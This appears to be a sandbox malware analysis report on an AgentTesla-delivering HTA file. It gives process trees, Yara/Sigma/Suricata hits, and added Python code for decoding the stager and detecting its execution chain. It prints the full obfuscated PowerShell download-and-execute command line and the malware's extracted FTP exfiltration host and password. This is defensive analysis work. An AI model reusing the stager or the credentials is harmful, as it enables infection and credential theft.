
Windows Analysis Report
morninghtaaaafilex.hta

Overview

General Information

Sample name: morninghtaaaafilex.hta
Analysis ID: 1629094
MD5: 38191fe427e709654ac305d6523ab9bb
SHA1: fdbb42e07425f82a53594ada0839cc8cd9624a3c
SHA256: 5acc5fb8b248445eec0f184a6a74a2a715646ebbfa1e53ba67fed6321eddd191
Tags: hta, user-abuse_ch

Detection

AgentTesla
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected VBS Downloader Generic
Check if machine is in data center or colocation facility
Command shell drops VBS files
Connects to a pastebin service (likely for C&C)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Joe Sandbox ML detected suspicious sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Legitimate Application Dropped Script
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Silenttrinity Stager Msbuild Activity
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match

Classification

(classification diagram not captured in this text extract)

Process Tree

  • System is w10x64
  • mshta.exe (PID: 7404 cmdline: mshta.exe "C:\Users\user\Desktop\morninghtaaaafilex.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 7460 cmdline: "C:\Windows\System32\cmd.exe" /c C:\Windows\Temp\misdivide.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 7512 cmdline: wscript //nologo "C:\Windows\Temp\octupole.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
        • powershell.exe (PID: 7624 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#Bl#Hg#a#Bh#HU#cwB0#GU#Z##g#D0#I##n#HQ#e#B0#C4#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##2#GU#cwBh#GI#Lw#3#DE#Lg#w#DI#Mg#u#DM#Lg#y#Dk#MQ#v#C8#OgBw#HQ#d#Bo#Cc#Ow#k#HM#bgBp#HQ#d#B5#C##PQ#g#CQ#ZQB4#Gg#YQB1#HM#d#Bl#GQ#I##t#HI#ZQBw#Gw#YQBj#GU#I##n#CM#Jw#s#C##JwB0#Cc#Ow#k#HM#a#Bv#HY#ZQBs#GE#cgBk#C##PQ#g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#DE#M##w#Dc#LgBm#Gk#b#Bl#G0#YQBp#Gw#LgBj#G8#bQ#v#GE#c#Bp#C8#ZgBp#Gw#ZQ#v#Gc#ZQB0#D8#ZgBp#Gw#ZQBr#GU#eQ#9#EU#UwBZ#FQ#aQBU#FI#MwBP#D##MwBF#DU#cQBy#E0#bgBJ#Hk#eQBX#HQ#WQBm#DU#TwBN#EY#VQ#w#G0#YQBr#Hg#TQB1#D##ZQBQ#HE#UgBS#Eo#TgBp#GM#TgBq#EM#Mw#2#GE#O#BU#DI#agBH#GY#VwBU#DY#RgBF#EI#ag#1#HM#JgBw#Gs#XwB2#Gk#Z##9#DM#N##y#Dg#M##z#GQ#MQBj#GM#N#Bl#DM#Yg#4#D##MQ#3#DQ#M##2#DY#Nw#w#DU#M##4#D##YQ#1#GU#Zg#n#Ds#J#Bv#HI#ZwBh#G4#bwBs#GE#bgB0#Gg#YQBu#HU#bQ#g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#J#Bz#HQ#aQBs#GI#ZQBu#GU#I##9#C##J#Bv#HI#ZwBh#G4#bwBs#GE#bgB0#Gg#YQBu#HU#bQ#u#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#Cg#J#Bz#Gg#bwB2#GU#b#Bh#HI#Z##p#Ds#J#Bn#GU#cgB1#G4#Z#Bp#GE#b#Bs#Hk#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FQ#ZQB4#HQ#LgBF#G4#YwBv#GQ#aQBu#Gc#XQ#6#Do#VQBU#EY#O##u#Ec#ZQB0#FM#d#By#Gk#bgBn#Cg#J#Bz#HQ#aQBs#GI#ZQBu#GU#KQ#7#CQ#ZQB0#Gg#bQBv#HY#bwBt#GU#cgBp#G4#ZQ#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#CQ#bwBy#Gk#ZwBp#G4#YQBy#Hk#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#CQ#bgBv#G4#YwBs#G8#d#Bo#Gk#bgBn#C##PQ#g#CQ#ZwBl#HI#dQBu#GQ#aQBh#Gw#b#B5#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQB0#Gg#bQBv#HY#bwBt#GU#cgBp#G4#ZQ#p#Ds#J#Bt#GU#d#Bv#G4#eQBt#HM#I##9#C##J#Bn#GU#cgB1#G4#Z#Bp#GE#b#Bs#Hk#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bv#HI#aQBn#Gk#bgBh#HI#eQ#p#Ds#J#Bu#G8#bgBj#Gw#bwB0#Gg#aQBu#Gc#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bt#GU#d#Bv#G4#eQBt#HM#I##t#Gc#d##g#CQ#bgBv#G4#YwBs#G8#d#Bo#Gk#bgBn#Ds#J#Bu#G8#bgBj#Gw#bwB0#Gg#aQBu#Gc#I##r#D0#I##k#GU#d#Bo#G0#bwB2#G8#bQBl#HI#aQBu#GU#LgBM#GU
#bgBn#HQ#a##7#CQ#cwBw#GE#YwBp#GU#cg#g#D0#I##k#G0#ZQB0#G8#bgB5#G0#cw#g#C0#I##k#G4#bwBu#GM#b#Bv#HQ#a#Bp#G4#Zw#7#CQ#cwB1#GI#agBl#GM#d##g#D0#I##k#Gc#ZQBy#HU#bgBk#Gk#YQBs#Gw#eQ#u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bu#G8#bgBj#Gw#bwB0#Gg#aQBu#Gc#L##g#CQ#cwBw#GE#YwBp#GU#cg#p#Ds#J#Bn#HI#eQBs#Gw#dQBz#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBD#G8#bgB2#GU#cgB0#F0#Og#6#EY#cgBv#G0#QgBh#HM#ZQ#2#DQ#UwB0#HI#aQBu#Gc#K##k#HM#dQBi#Go#ZQBj#HQ#KQ#7#CQ#YgBh#GM#awBj#Gg#YQBu#G4#ZQBs#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#ZwBy#Hk#b#Bs#HU#cw#p#Ds#J#Bp#G4#YwBs#GU#I##9#C##WwBk#G4#b#Bp#GI#LgBJ#E8#LgBI#G8#bQBl#F0#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#VgBB#Ek#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I#B##Cg#J#Bz#G4#aQB0#HQ#eQ#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#TQBT#EI#dQBp#Gw#Z##n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Ck#KQ#='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 7632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • MSBuild.exe (PID: 7776 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
          • MSBuild.exe (PID: 7784 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
      • timeout.exe (PID: 7520 cmdline: timeout /t 1 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup
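The powershell.exe command line at PID 7624 does not use -EncodedCommand; it stores the payload in $Codigo as base64 of UTF-16LE text in which every 'A' has been swapped for '#', then undoes the swap with .Replace('#','A'), decodes it with FromBase64String and Unicode.GetString, and hands the result to Invoke-Expression. Because UTF-16LE ASCII text base64-encodes with a null high byte in every other position, 'A' is by far the most common character in such a blob, so the substituted character stands out by frequency. The following decoder is an added example, not code from the report or from the sample; it embeds only the first 40 characters of the $Codigo string from the process tree above (which decode to the start of a variable assignment, "$exhausted = 't"), and the round-trip helper and the "@" variant are constructed test inputs.

```python
"""Decode the '#'-for-'A' obfuscated PowerShell stager seen in the PID 7624 command line."""
import base64
import re
from collections import Counter
from typing import Optional

B64_ALPHABET = set("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=")

# First 40 characters of the $Codigo string from the report's process tree.
# The full blob is several kilobytes; this prefix is enough to show the scheme.
CODIGO_PREFIX = "J#Bl#Hg#a#Bh#HU#cwB0#GU#Z##g#D0#I##n#HQ#"


def guess_placeholder(blob: str) -> Optional[str]:
    """Return the most frequent character that is not legal base64, or None.

    UTF-16LE text base64-encodes with a high proportion of 'A' (every other
    byte of ASCII text is 0x00), so when an author swaps 'A' for a junk
    character that character dominates the blob.
    """
    foreign = [c for c in blob if c not in B64_ALPHABET]
    return Counter(foreign).most_common(1)[0][0] if foreign else None


def decode_stager(blob: str, placeholder: Optional[str] = None, original: str = "A") -> str:
    """Reverse the three steps the sample's command line performs:
       $Codigo.Replace('#','A') -> [Convert]::FromBase64String -> Unicode.GetString
    If no placeholder is given it is guessed from character frequency.
    """
    if placeholder is None:
        placeholder = guess_placeholder(blob) or ""
    b64 = blob.replace(placeholder, original) if placeholder else blob
    raw = base64.b64decode(b64, validate=True)  # raises if the guess left junk behind
    return raw.decode("utf-16-le")


def encode_stager(script: str, placeholder: str = "#", original: str = "A") -> str:
    """Forward transform; used only to build constructed test inputs."""
    b64 = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return b64.replace(original, placeholder)


def extract_codigo(cmdline: str) -> Optional[str]:
    """Pull the single-quoted blob out of a command line of the form
    ... -Command "$Codigo = '<blob>'; ..." ($Codigo is the sample's own variable name)."""
    m = re.search(r"\$Codigo\s*=\s*'([^']+)'", cmdline)
    return m.group(1) if m else None


if __name__ == "__main__":
    print("placeholder:", guess_placeholder(CODIGO_PREFIX))
    print("decoded prefix:", repr(decode_stager(CODIGO_PREFIX)))
```

Run against the full $Codigo string from a log or the report, the decoded text is the second-stage PowerShell that the AMSI buffer (amsi32_7624.amsi.csv) and the "Powershell download and execute" Yara hit refer to; validate=True makes the decode fail loudly if the guessed placeholder is wrong rather than returning garbage.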
Malware Configuration

Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Extracted configuration (AgentTesla): {"Exfil Mode": "FTP", "Host": "ftp://ftp.rvoccte.com", "Username": "mybloddycockcpanel_owner@rvoccte.com", "Password": "ft]@0i!$%!ho"}
Yara Overview

Yara matches: dropped files
Source | Rule | Description | Author
C:\Windows\Temp\octupole.vbs | JoeSecurity_VBS_Downloader_Generic | Yara detected VBS Downloader Generic | Joe Security

Yara matches: memory dumps
Source | Rule | Description | Author
00000008.00000002.2934590223.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000008.00000002.2934590223.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000008.00000002.2936900255.0000000002A15000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000005.00000002.1853721064.0000000005D1E000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000005.00000002.1853721064.0000000005D1E000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
(7 further entries not shown in this extract)

Yara matches: unpacked PEs
Source | Rule | Description | Author
8.2.MSBuild.exe.400000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
8.2.MSBuild.exe.400000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
8.2.MSBuild.exe.400000.0.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen
  • 0x34647:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x346b9:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x34743:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x347d5:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x3483f:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x348b1:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x34947:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x349d7:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
8.2.MSBuild.exe.400000.0.unpack | MALWARE_Win_AgentTeslaV2 | AgenetTesla Type 2 Keylogger payload | ditekSHen
  • 0x31783:$s2: GetPrivateProfileString
  • 0x30d7a:$s3: get_OSFullName
  • 0x32505:$s5: remove_Key
  • 0x326e8:$s5: remove_Key
  • 0x335e8:$s6: FtpWebRequest
  • 0x34629:$s7: logins
  • 0x34b9b:$s7: logins
  • 0x3787e:$s7: logins
  • 0x3795e:$s7: logins
  • 0x392b1:$s7: logins
  • 0x384f8:$s9: 1.85 (Hash, version 2, native byte-order)
5.2.powershell.exe.5e0e358.7.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
(7 further entries not shown in this extract)

Yara matches: AMSI script buffers
Source | Rule | Description | Author
amsi32_7624.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
amsi32_7624.amsi.csv | JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security

Sigma Overview

System Summary

Rule titles were not captured in this extract; the matching Sigma rule names are listed under Signatures above. The three "Process started" matches on powershell.exe all carry the same PID 7624 command line shown in the process tree, which is not repeated here.

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = '…' (PID 7624 command line, see process tree)
Source: File created | Author: frack113, Florian Roth (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\SysWOW64\mshta.exe, ProcessId: 7404, TargetFilename: C:\Windows\Temp\misdivide.bat
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = '…' (PID 7624 command line, see process tree)
Source: Network Connection | Author: frack113, Florian Roth | Data: DestinationIp: 23.186.113.60, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 7512, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49733
Source: Process started | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) | Data: Command: wscript //nologo "C:\Windows\Temp\octupole.vbs", CommandLine: wscript //nologo "C:\Windows\Temp\octupole.vbs", CommandLine|base64offset|contains: +, Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c C:\Windows\Temp\misdivide.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7460, ParentProcessName: cmd.exe, ProcessCommandLine: wscript //nologo "C:\Windows\Temp\octupole.vbs", ProcessId: 7512, ProcessName: wscript.exe
Source: Network Connection | Author: Kiran kumar s, oscd.community | Data: DestinationIp: 208.95.112.1, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 7784, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49736
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\cmd.exe" /c C:\Windows\Temp\misdivide.bat, CommandLine: "C:\Windows\System32\cmd.exe" /c C:\Windows\Temp\misdivide.bat, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\morninghtaaaafilex.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7404, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c C:\Windows\Temp\misdivide.bat, ProcessId: 7460, ProcessName: cmd.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton | Data: Command: wscript //nologo "C:\Windows\Temp\octupole.vbs", CommandLine: wscript //nologo "C:\Windows\Temp\octupole.vbs", CommandLine|base64offset|contains: +, Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c C:\Windows\Temp\misdivide.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7460, ParentProcessName: cmd.exe, ProcessCommandLine: wscript //nologo "C:\Windows\Temp\octupole.vbs", ProcessId: 7512, ProcessName: wscript.exe
Source: File created | Author: Florian Roth (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\SysWOW64\mshta.exe, ProcessId: 7404, TargetFilename: C:\Windows\Temp\misdivide.bat
Source: Network Connection | Author: frack113 | Data: DestinationIp: 23.186.113.60, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 7512, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49733
Source: Process started | Author: Michael Haag | Data: Command: wscript //nologo "C:\Windows\Temp\octupole.vbs", CommandLine: wscript //nologo "C:\Windows\Temp\octupole.vbs", CommandLine|base64offset|contains: +, Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c C:\Windows\Temp\misdivide.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7460, ParentProcessName: cmd.exe, ProcessCommandLine: wscript //nologo "C:\Windows\Temp\octupole.vbs", ProcessId: 7512, ProcessName: wscript.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = '…' (PID 7624 command line, see process tree)
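The Sigma matches above all key on parent/child relationships and command-line content in process-creation telemetry: mshta.exe spawning cmd.exe, a script host running from C:\Windows\Temp, wscript.exe starting powershell.exe, a very long PowerShell command line that calls FromBase64String after a .Replace(), and powershell.exe spawning MSBuild.exe. The script below is an added example, not part of the Joe Sandbox report or of any Sigma rule: it replays the chain from the process tree as constructed Sysmon-style Event ID 1 records (PIDs and paths taken from the tree; explorer.exe as the parent of mshta.exe, the benign PID 9001 record and the 1000-character length threshold are assumptions) through a handful of checks written to mirror those rule ideas.

```python
"""Process-creation checks modelled on the Sigma hits for this sample, run over
constructed events that mirror the mshta -> cmd -> wscript -> powershell -> MSBuild chain."""
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class ProcEvent:
    """Subset of a Sysmon Event ID 1 (process creation) record."""
    pid: int
    image: str
    cmdline: str
    parent_image: str


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
MSHTA_CHILDREN = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}
SUSPICIOUS_DIRS = ("c:\\windows\\temp\\", "c:\\users\\public\\", "\\appdata\\local\\temp\\")
IEX_RE = re.compile(r"invoke-expression|\biex\b", re.IGNORECASE)
LONG_CMDLINE = 1000  # assumed threshold; legitimate interactive PowerShell rarely gets this long


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def check_event(ev: ProcEvent) -> List[str]:
    """Return the names of the checks that fire for one process-creation event."""
    img, parent, cl = basename(ev.image), basename(ev.parent_image), ev.cmdline.lower()
    hits: List[str] = []
    if parent == "mshta.exe" and img in MSHTA_CHILDREN:
        hits.append("suspicious_mshta_child")
    if parent in SCRIPT_HOSTS and img == "powershell.exe":
        hits.append("wsh_spawns_powershell")
    if img in SCRIPT_HOSTS | {"cmd.exe"} and any(d in cl for d in SUSPICIOUS_DIRS):
        hits.append("script_from_suspicious_folder")
    # The sample's pattern: undo a character substitution, base64-decode, then evaluate.
    if img == "powershell.exe" and "frombase64string" in cl and ".replace(" in cl and IEX_RE.search(cl):
        hits.append("replace_base64_iex")
    if img == "powershell.exe" and len(ev.cmdline) > LONG_CMDLINE:
        hits.append("very_long_powershell_cmdline")
    if parent == "powershell.exe" and img == "msbuild.exe":
        hits.append("powershell_spawns_msbuild")
    return hits


def scan(events: List[ProcEvent]) -> Dict[int, List[str]]:
    """Map each PID that triggers at least one check to the list of check names."""
    result: Dict[int, List[str]] = {}
    for ev in events:
        hits = check_event(ev)
        if hits:
            result[ev.pid] = hits
    return result


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed stand-in for the PID 7624 command line: same structure, repeated filler blob.
STAGER_CMD = (
    '"' + PS + '" -NoProfile -Command "$Codigo = \'' + "J#Bl#Hg#a#Bh#" * 120
    + "'; $OWjuxd = [System.Text.Encoding]::Unicode.GetString("
    "[Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd\""
)

# Constructed events; PIDs, images and command lines follow the report's process tree.
SAMPLE_EVENTS = [
    ProcEvent(7404, r"C:\Windows\SysWOW64\mshta.exe",
              r'mshta.exe "C:\Users\user\Desktop\morninghtaaaafilex.hta"', r"C:\Windows\explorer.exe"),
    ProcEvent(7460, r"C:\Windows\SysWOW64\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /c C:\Windows\Temp\misdivide.bat', r"C:\Windows\SysWOW64\mshta.exe"),
    ProcEvent(7512, r"C:\Windows\SysWOW64\wscript.exe",
              r'wscript //nologo "C:\Windows\Temp\octupole.vbs"', r"C:\Windows\SysWOW64\cmd.exe"),
    ProcEvent(7624, PS, STAGER_CMD, r"C:\Windows\SysWOW64\wscript.exe"),
    ProcEvent(7784, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
              r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"', PS),
    # Benign control record (constructed): an admin running PowerShell from the shell.
    ProcEvent(9001, PS, '"' + PS + '" -NoProfile -Command "Get-Process | Sort-Object CPU"',
              r"C:\Windows\explorer.exe"),
]


if __name__ == "__main__":
    for pid, hits in scan(SAMPLE_EVENTS).items():
        print(pid, ", ".join(hits))
```

The per-event checks are deliberately independent so that each can be tuned or suppressed on its own; in a real pipeline the interesting signal is several of them firing along one parent chain within seconds, which is exactly what the Joe Sandbox "Suspicious execution chain found" signature summarises.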
Suricata IDS alerts

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-04T11:56:57.117400+0100 | 2020423 | 1 | Exploit Kit Activity Detected | 192.3.220.17 | 80 | 192.168.2.4 | 49735 | TCP
2025-03-04T11:56:49.533534+0100 | 2057635 | 1 | A Network Trojan was detected | 192.3.220.17 | 80 | 192.168.2.4 | 49735 | TCP
2025-03-04T11:56:56.106135+0100 | 2049038 | 1 | A Network Trojan was detected | 142.215.209.72 | 443 | 192.168.2.4 | 49734 | TCP
2025-03-04T11:56:49.533534+0100 | 2858295 | 1 | A Network Trojan was detected | 192.3.220.17 | 80 | 192.168.2.4 | 49735 | TCP


                        AV Detection

Source: 5.2.powershell.exe.5e0e358.7.raw.unpack | Malware Configuration Extractor: AgentTesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.rvoccte.com", "Username": "mybloddycockcpanel_owner@rvoccte.com", "Password": "ft]@0i!$%!ho"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.8% probability
Source: unknown | HTTPS traffic detected: 23.186.113.60:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.215.209.72:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 150.171.28.10:443 -> 192.168.2.4:49831 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 150.171.28.10:443 -> 192.168.2.4:49832 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 150.171.28.10:443 -> 192.168.2.4:49833 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 150.171.28.10:443 -> 192.168.2.4:49841 version: TLS 1.2
                        Source: Binary string: dnlib.DotNet.Pdb.PdbWriter+ source: powershell.exe, 00000005.00000002.1853721064.0000000005ADF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1875380332.00000000093E0000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000005.00000002.1853721064.0000000005ADF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1875380332.00000000093E0000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.resourcesuserresourcedatadnlib.dotnetassemblyrefuserdnlib.dotnetresolveexceptiondnlib.dotnet.emitmethodbodyreaderdnlib.dotnet.resourcesresourcewritermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnet.pdbsymbolreadercreatordnlib.peimagesectionheaderdnlib.dotnet.emitlocallistdnlib.dotnet.writermdtablewriterdnlib.dotnetimdtokenproviderdnlib.dotnet.emitmethodbodyreaderbasednlib.dotnetmethodequalitycomparerdnlib.dotnetmdtokendnlib.dotnettypenameparserdnlib.dotnet.writeriheap source: powershell.exe, 00000005.00000002.1882706332.00000000095E5000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000005.00000002.1882706332.00000000095E5000.00000004.00000800.00020000.00000000.sdmp
